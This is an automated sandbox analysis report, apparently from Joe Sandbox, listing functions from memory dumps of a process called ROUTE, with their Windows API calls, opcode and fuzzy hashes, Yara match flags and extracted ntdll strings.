                                                                                                                            • Instruction ID: 7c780edfd1a3858a2f3dcecf27326aed2e69bf0c63346ea54a7b0d37116d93f3
                                                                                                                            • Opcode Fuzzy Hash: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                                                            • Instruction Fuzzy Hash: 1201CCB5E4020AABDB10DBE4DD42FDDB7B89B54308F004195B908A7282F671EA588B91
                                                                                                                            Function 00AB98E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,00AA832E,00000010,?,?,?,00000044,?,00000010,00AA832E,?,00000000,?), ref: 00AB9943
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2186235152-0
                                                                                                                            • Opcode ID: 671fddae834eef9a986202feb47780fc4726c027dd2d673c94bd21dafe3b195e
                                                                                                                            • Instruction ID: 6a3e55a67e2a173dbb0bb73fd9d9b476ebd38133e6abf8214b8c591f3d5363b6
                                                                                                                            • Opcode Fuzzy Hash: 671fddae834eef9a986202feb47780fc4726c027dd2d673c94bd21dafe3b195e
                                                                                                                            • Instruction Fuzzy Hash: B001CCB2204108BBCB44DE89DC81EEB77ADAF8C714F018208BA09E3241DA30F8518BA4
                                                                                                                            Function 00A99DB0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00A99DF5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: a00885ac3c91a2ed3eecabbd7396b270ed8e90709770fb43edf4f08bfa2c8301
                                                                                                                            • Instruction ID: 951ac85fc2775b2e3b9f35b563e0704731510cd6edab1faeeabbe42cfb2d4c2a
                                                                                                                            • Opcode Fuzzy Hash: a00885ac3c91a2ed3eecabbd7396b270ed8e90709770fb43edf4f08bfa2c8301
                                                                                                                            • Instruction Fuzzy Hash: 6AF0397338020436E62066A99D02FDBA69CCB85BA1F250425F60CEB282D992B91182E5
                                                                                                                            Function 00AA83B7 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00AA839C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: d2d9782d338baf92f7f6c86506228d20aff339c068052cd2d406c6ccabd55ddd
                                                                                                                            • Instruction ID: 4336af2337c5eacf7f8b2c2796033be5677a0dc4a3650c003b595a5e65a896d1
                                                                                                                            • Opcode Fuzzy Hash: d2d9782d338baf92f7f6c86506228d20aff339c068052cd2d406c6ccabd55ddd
                                                                                                                            • Instruction Fuzzy Hash: C5F0E9751502012ADF107B28CC46BB2B758AB56B20F544654F4449F1C3EBBAA8128360
                                                                                                                            Function 00AB9800 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000104,?,00AB180C,?,?,00AB180C,?,00000104,?,00009D57), ref: 00AB983C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                                                            • Instruction ID: bc51d88214e09b9ed5b2fb5b457844efbd39e41ca553b33d8e042303b94692c6
                                                                                                                            • Opcode Fuzzy Hash: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                                                            • Instruction Fuzzy Hash: 5FE065B66042047BDA20EE58DC41EEB77ACEFC8720F004408FA08A7242D671B8118BB8
                                                                                                                            Function 00AB9850 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F845C700,00000007,00000000,00000004,00000000,00AA3DDB,000000F4), ref: 00AB988C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                                                            • Instruction ID: 81959a5bdf6a07fc755b2c242aed1282a9adf85855d72aaa47a6bd45d4c9bf1b
                                                                                                                            • Opcode Fuzzy Hash: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                                                            • Instruction Fuzzy Hash: 57E065B26042047BDA10EE58DC42FEB33ACEFC8710F004408FA08A7242D672B8108BB8
                                                                                                                            Function 00AA836A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00AA839C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 05fb7c337f53ac48de3ae62af19cb0c17d93f744b11d69e0e8308fd602dbfd3e
                                                                                                                            • Instruction ID: e8d75fc6d7afaaaa84fd9e8ec6e0d55de9342d86dbeba2d9dc8dd31fc8d6ff8b
                                                                                                                            • Opcode Fuzzy Hash: 05fb7c337f53ac48de3ae62af19cb0c17d93f744b11d69e0e8308fd602dbfd3e
                                                                                                                            • Instruction Fuzzy Hash: 5EE0207114030437EB207768CC46FA63358EF46B60F544674B8189F1C3EA7AF91143A0
                                                                                                                            Function 00AA8370 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00AA839C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: f9794e067ae3447b555326686bc9826f63314cf8011d7de037bd7b062c62e9e5
                                                                                                                            • Instruction ID: 5b01055c6c3bfdc02f5abd5546f6a5eb36bb5bd745421d42a66951f88487e040
                                                                                                                            • Opcode Fuzzy Hash: f9794e067ae3447b555326686bc9826f63314cf8011d7de037bd7b062c62e9e5
                                                                                                                            • Instruction Fuzzy Hash: 33E0807115020427EF247768DC45F66335C5F85B64F544664B91CDF1C2DA7DF9114260
                                                                                                                            Function 00AA8157 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00AA1D50,00AB7FCE,00AB568F,00AA1D13), ref: 00AA8193
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 5030f345bf0ee70ff83990bab5f9a31eec18b2c10fa2af2b5d8427bb27453d03
                                                                                                                            • Instruction ID: b5da39db769b8ed1a3c27306146f4a29e32ea53c4dacbf3552d40a774c6f1bb7
                                                                                                                            • Opcode Fuzzy Hash: 5030f345bf0ee70ff83990bab5f9a31eec18b2c10fa2af2b5d8427bb27453d03
                                                                                                                            • Instruction Fuzzy Hash: 7AE086613C438637F740E7B09C46F567B985F82354F0C84E8F9489B2C3D995D11083A5
                                                                                                                            Function 00AA8160 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00AA1D50,00AB7FCE,00AB568F,00AA1D13), ref: 00AA8193
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 66acfe115b10dd0cdfbbbef63d3d977e36db5f9dd7ea407bfb29fc943c5f1d26
                                                                                                                            • Instruction ID: 272f44f9e8def54f59514b9cc957d48c85e7e3da5e42098f14883c2908f1ee28
                                                                                                                            • Opcode Fuzzy Hash: 66acfe115b10dd0cdfbbbef63d3d977e36db5f9dd7ea407bfb29fc943c5f1d26
                                                                                                                            • Instruction Fuzzy Hash: 90D05EB12803063BF640B7A4CD07F56769C4B85794F088074BA0CEB2C3EDA6E51082A5
                                                                                                                            Function 03302C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: f5060dc80d748c3440066faa9ff2113ef688551ef39847efdd1cc21be37dc5d1
                                                                                                                            • Instruction ID: 0151644a66fc3e19f0fa9b337e5f62cda02ea2b151001e1233be6ca74a0b252a
                                                                                                                            • Opcode Fuzzy Hash: f5060dc80d748c3440066faa9ff2113ef688551ef39847efdd1cc21be37dc5d1
                                                                                                                            • Instruction Fuzzy Hash: D9B09B719415C5C6DA15E7644A4C717790467D1701F19C465D2034685E4739C1D1E275

                                                                                                                            Non-executed Functions

                                                                                                                            Function 031A04CE Relevance: .1, Instructions: 148COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541270412.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_31a0000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aeb201b127ed4eef0d0d2a6d72c58165ced946470ba6a8c2c3ec0c2fa56ca5bd
                                                                                                                            • Instruction ID: 703a22c4179971212cd693ae88a6ea98e3b4db4bbc97786b63e1b77350b908ca
                                                                                                                            • Opcode Fuzzy Hash: aeb201b127ed4eef0d0d2a6d72c58165ced946470ba6a8c2c3ec0c2fa56ca5bd
                                                                                                                            • Instruction Fuzzy Hash: 7141E679A18F0D4FD368EF6C9081276B3E2FB4D311F54062DC98AC7252EB74E8428785
                                                                                                                            Function 00A9E21E Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f30ed63e23de29af50ae00158a8f32c52e1f4d1c5ee98b1bb96a32c440ef3167
                                                                                                                            • Instruction ID: e1d539b71edb75d60b632f8a27bc54ed4e1cae7e0a19eaf953a5f89a937302bf
                                                                                                                            • Opcode Fuzzy Hash: f30ed63e23de29af50ae00158a8f32c52e1f4d1c5ee98b1bb96a32c440ef3167
                                                                                                                            • Instruction Fuzzy Hash: 72C08C33A681108AC634890DB8C16F4F7A4E347130F1037EAE888E7901D086C1A20159
                                                                                                                            Function 031ADEB9 Relevance: 56.5, Strings: 45, Instructions: 211COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541270412.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_31a0000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                            • API String ID: 0-3558027158
                                                                                                                            • Opcode ID: 6e578b878be74098917343d695d2a51f32c8d2ed80991d1ede1da86247c354e8
                                                                                                                            • Instruction ID: 8cc26af1d3b1798fad80c8808312b3d68ef35521ec1353209cf879c676dcba6e
                                                                                                                            • Opcode Fuzzy Hash: 6e578b878be74098917343d695d2a51f32c8d2ed80991d1ede1da86247c354e8
                                                                                                                            • Instruction Fuzzy Hash: B19141F04482948AC7158F59A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95
                                                                                                                            Function 03302890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: 3bfa10e8e87b14f57550acd3b4b5f115a3f42e1cba083847c97ab048ac4faa3a
                                                                                                                            • Instruction ID: 8263e148c2bd3ce1f32d9686b3cb0a9c6ff524894d256ae3dd5a56567fa11e06
                                                                                                                            • Opcode Fuzzy Hash: 3bfa10e8e87b14f57550acd3b4b5f115a3f42e1cba083847c97ab048ac4faa3a
                                                                                                                            • Instruction Fuzzy Hash: 5251E6BAA00116BFDB15DBA88CD497FF7BCBF09201714C669E4E5D7681D234DE508BA0
                                                                                                                            Function 03372410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: 4a7e297fa8348768bb105b88ccf91f3284ae2aaa30b178e1f146f952409b5052
                                                                                                                            • Instruction ID: 3e9221583bcac7aeb30f13aa1543f3b108cd4690c11fe5dd766cc6c7000cb7fe
                                                                                                                            • Opcode Fuzzy Hash: 4a7e297fa8348768bb105b88ccf91f3284ae2aaa30b178e1f146f952409b5052
                                                                                                                            • Instruction Fuzzy Hash: C851D4B5A00645AECB34DE5CCCD097FF7FDEB44240B048859E596D7641E7B8EA80C760
                                                                                                                            Function 031A3A69 Relevance: 15.1, Strings: 12, Instructions: 74COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541270412.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_31a0000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ##.`$#&$*$&#*`$&$*o$&;`y$.).=$??#*$a{og$a}a{$o${$|vx}
                                                                                                                            • API String ID: 0-3596917867
                                                                                                                            • Opcode ID: 7a11c76c9737fc9a91b10bddbb426355f46157ad682ba83da3993119e561a5bf
                                                                                                                            • Instruction ID: 39c6fcd103d8773fbba2cbbd654518ef8bc9f6e5c2e3be9cff7c01174d315633
                                                                                                                            • Opcode Fuzzy Hash: 7a11c76c9737fc9a91b10bddbb426355f46157ad682ba83da3993119e561a5bf
                                                                                                                            • Instruction Fuzzy Hash: FB3185F081464CDBCF19DF88E6816EEBFB2FF28344F805259E9056F240D7B58A558B89
                                                                                                                            Function 032F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • Execute=1, xrefs: 03334713
                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03334787
                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03334742
                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03334655
                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03334725
                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033346FC
                                                                                                                            • ExecuteOptions, xrefs: 033346A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                            • API String ID: 0-484625025
                                                                                                                            • Opcode ID: cb93b6c71b21f9c49421d9457735748630f8e8390f5fc79f1f775b3744f6b260
                                                                                                                            • Instruction ID: 3bf56e0dae5defb7f70fc4168ba3f1abe6709bc9ecd1cba637586589a7213a71
                                                                                                                            • Opcode Fuzzy Hash: cb93b6c71b21f9c49421d9457735748630f8e8390f5fc79f1f775b3744f6b260
                                                                                                                            • Instruction Fuzzy Hash: 4A51F935A203196FDF10EBADDCD5FADB7ACAF08750F0400A9E605AB1D1E770AA858F50
                                                                                                                            Function 03396940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                            • Instruction ID: 7bd1e1a5bbd20d77c2501ecfddbc7213ebc38caf9e03a3a2d360a44b8e9840a1
                                                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                            • Instruction Fuzzy Hash: 78023675909341AFE705CF18C991A6FB7E9EFC8710F04892EF9855B2A4DB31E905CB42
                                                                                                                            Function 0330B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-$0$0
                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction ID: a037f30430cd7d94b1cbc4973026490265b817ec6d7611299e2dae1b0235ccc8
                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction Fuzzy Hash: 8881AD34E052499ADF28CE68C8E17BEFBB6AF45710F1C465AE861A73D0C734D8408B64
                                                                                                                            Function 033720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                            • Opcode ID: 79aed85bb2d4ee9d041ee49a8e6d691e88a98696b5c3755d1a1cce091082ab2d
                                                                                                                            • Instruction ID: 19706df4998d5d788948bc5e64dc17c3e2f20da00359d0fa758f18e68ee6d334
                                                                                                                            • Opcode Fuzzy Hash: 79aed85bb2d4ee9d041ee49a8e6d691e88a98696b5c3755d1a1cce091082ab2d
                                                                                                                            • Instruction Fuzzy Hash: 9021627AE00259ABCB20DF79CC90AEFB7FCEF44640F080516E955E7240EB34DA018BA1
                                                                                                                            Function 032EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033302BD
                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033302E7
                                                                                                                            • RTL: Re-Waiting, xrefs: 0333031E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                            • API String ID: 0-2474120054
                                                                                                                            • Opcode ID: c304cc3d3140dfd4ff1450d64b43c43a7f585289c3078da759580000564a1298
